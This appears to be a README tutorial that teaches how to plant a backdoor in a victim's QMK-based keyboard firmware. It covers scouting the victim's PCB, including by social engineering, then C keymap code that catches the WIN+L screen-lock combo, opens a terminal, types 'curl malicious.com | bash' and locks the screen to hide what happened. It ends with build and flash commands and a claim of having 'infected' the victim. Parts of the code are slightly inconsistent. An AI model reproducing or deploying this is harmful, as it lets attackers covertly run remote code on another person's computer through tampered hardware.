Awesome
QMKhuehuebr
This repo will teach you how to create a "backdoor" on a keyboard using qmk firmware.
What's QMK?
It's a open source keyboard firmware, read the documentation for more info.
How does this "Backdoor" works?
It hooks a set of keystrokes used for screen locking using the qmk combo feature, so when the user locks the computer his keyboard will start acting like a rubberducky or "possessed" keyboard injecting keystrokes in the target machine.
Steps to get a Shell
Keyboard Recon
The most important step is to recognize which PCB your victim's keyboard uses. This can be done in several ways:
- Social Engineering
- Opening the keyboard case
- Being a keyboard guru
Get QMK Firmware Project
git clone https://github.com/qmk/qmk_firmware.git
cd qmk_firmware
util/(linux|macos)_install.sh
Enabling and Configuring Combos feature
Now that you know your victim's keyboard PCB, go to qmk_firmware/keyboards/<PCB_MODEL>/
and then add the line COMBO_ENABLE = yes
at the last line of file rules.mk
, to enable the usage of combos. Also modify the following lines at the last line of file config.h
:
#define COMBO_COUNT 1
#define COMBO_TERM 300
The COMBO_COUNT
variable is the number of combos/hooks you'll configure, and the COMBO_TERM
is the time in milliseconds for the firmware to detect the key combination/combo.
Creating the Combos/Hooks
Copy the default keymap to a new keymap named keylogger,
cd qmk_firmware/keyboards/<PCB_MODEL>/keymaps
mkdir keylogger
cp -R default/* keylogger
cd keylogger/
Edit the keymap.c
file to insert your malicious code after the #include "action_layer.h"
line, the first thing you need to do is create an enum with your hook name:
enum combo_events {
LOCK_SCREEN
}
Then you need to set the key combinations you want to hook, in this example let's hook the WIN+L lock screen bind:
const uint16_t PROGMEM lock_screen_combo[] = {KC_LGUI, KC_L, COMBO_END};
If you want to hook other keys just look at this qmk documentation page where you can find a list with all keycodes.
Giving actions to Combos/Hooks
Now the last part of coding is to add an action when the firmware detects the combo/hook, in order to do this, let's keep editing the keymap.c
and declare the function bellow which is responsible for the detection and injection:
void process_combo_event(uint8_t combo_index, bool pressed) {
switch(combo_index) {
case LOCK_SCREEN_X:
if (pressed) {
// SEND THE COMBINATION KEYS TO OPEN TERMINAL WIN+ENTER
register_code(KC_LGUI);
register_code(KC_ENTER);
// RELEASE THE KEYS TO OPEN THE TERMINAL
unregister_code(KC_ENTER);
unregister_code(KC_LGUI);
//WAIT 500 MILLISECONDS FOR THE TERMINAL OPEN
_delay_ms(500);
//SEND COMMAND USING THE MACRO SEND_STRING WHICH SENDS KEYCODE BY KEYCODE WITHOUT DELAY
SEND_STRING("curl malicious.com \\| bash ; exit" SS_TAP(X_ENTER));
//SEND THE ORIGINAL KEYCODES RESPONSIBLE TO LOCK THE COMPUTER
register_code(KC_LGUI);
register_code(KC_L);
// RELEASE THE KEYS RESPONSIBLE TO LOCK THE COMPUTER
unregister_code(KC_L);
unregister_code(KC_LGUI);
}
}
break;
}
Compile the code
Go back to the qmk project root directory and run:
make <KEYBOARD_PCB>:keylogger
If there was no errors, you did everything right and is ready to move on.
Boot Mode
In order to put the keyboard on boot mode, follow the QMK instruction
Write the malicious firmware
Just run the command:
sudo make <KEYBOARD_PCB>:keylogger:dfu
Now after all these steps you have successfully infected your victim's keyboard.
Learn more about QMK
Example
You can find a more complex example of keymap.c on this repository.
IMPORTANT - This file is based on xd60 PCB.
Poc
PoC usign a xd60 PCB